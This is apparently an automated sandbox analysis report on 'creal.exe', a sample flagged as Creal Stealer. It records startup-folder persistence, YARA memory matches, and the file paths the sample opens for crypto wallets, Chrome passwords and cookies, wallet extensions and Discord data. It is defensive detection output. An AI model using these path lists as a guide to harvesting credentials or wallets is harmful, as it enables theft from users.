            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\certifi VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922 VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922 VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI42922 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A60C560 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF67A60C560
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A626470 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF67A626470
            Source: C:\Windows\System32\curl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Creal Stealer
            Source: Yara matchFile source: 0000001C.00000003.1716089607.000002085E24E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1717159393.000002085E25C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1715402115.000002085F215000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1713151539.000002085E24C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1711307435.000002085F388000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1530242051.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506165356.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1570834386.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1551554678.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1535265611.00000185BBDD4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1748038824.000002085F38A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506829823.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1514358388.00000185BBDA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1546407514.00000185BBDF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1552635462.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1723970775.000002085E860000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1570617892.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1526078196.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1531149169.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1546301683.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1703156457.000002085F1E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1520628565.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1520628565.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1712107588.000002085E22D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1737494959.000002085E25D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1703944510.000002085E851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1534840732.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1704228303.000002085F214000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1704032686.000002085F380000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1703552422.000002085F1E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1516736251.00000185BBDD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1748098900.000002085F860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1703762541.000002085F1E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1707931768.000002085E22C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1706137097.000002085E212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1514920740.00000185BBDBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1707127966.000002085E212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1747339313.000002085F21D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1715680731.000002085E24E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1542555830.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1551628084.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1703156457.000002085F085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: creal.exe PID: 7612, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /Electrum/walletsz
            Source: creal.exe, 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Binance.exez5/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldbz
            Source: creal.exe, 00000002.00000003.1553243827.00000185BC88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: creal.exe, 00000002.00000003.1553243827.00000185BC88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: creal.exe, 00000002.00000003.1520628565.00000185BC87D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb5
            Source: creal.exe, 00000002.00000003.1553243827.00000185BC88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Tries to steal communication platform credentials (via file / registry access)
            Source: C:\Users\user\Desktop\creal.exeFile opened: C:\Users\user\AppData\Local\DiscordJump to behavior
            Source: C:\Users\user\Desktop\creal.exeFile opened: C:\Users\user\AppData\Local\DiscordCanaryJump to behavior
            Source: C:\Users\user\Desktop\creal.exeFile opened: C:\Users\user\AppData\Local\DiscordPTBJump to behavior
            Source: C:\Users\user\Desktop\creal.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopmentJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\Discord
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\DiscordCanary
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\DiscordPTB
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopment
            Yara detected Generic Python Stealer
            Source: Yara matchFile source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506165356.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: creal.exe PID: 7612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: creal.exe PID: 7612, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Creal Stealer
            Source: Yara matchFile source: 0000001C.00000003.1716089607.000002085E24E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1717159393.000002085E25C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1715402115.000002085F215000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1713151539.000002085E24C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1711307435.000002085F388000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1457557096.00000185BBEFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1530242051.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506165356.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1570834386.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1551554678.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1535265611.00000185BBDD4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1748038824.000002085F38A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506829823.00000185BBD8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1514358388.00000185BBDA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1546407514.00000185BBDF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1552635462.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1723970775.000002085E860000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1570617892.00000185BC84E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1526078196.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1531149169.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1546301683.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1506773484.00000185BBF19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1703156457.000002085F1E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1520628565.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1520628565.00000185BC87D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1712107588.000002085E22D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1737494959.000002085E25D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1572256883.00000185BCF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1703944510.000002085E851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1534840732.00000185BC84D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.1704228303.000002085F214000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
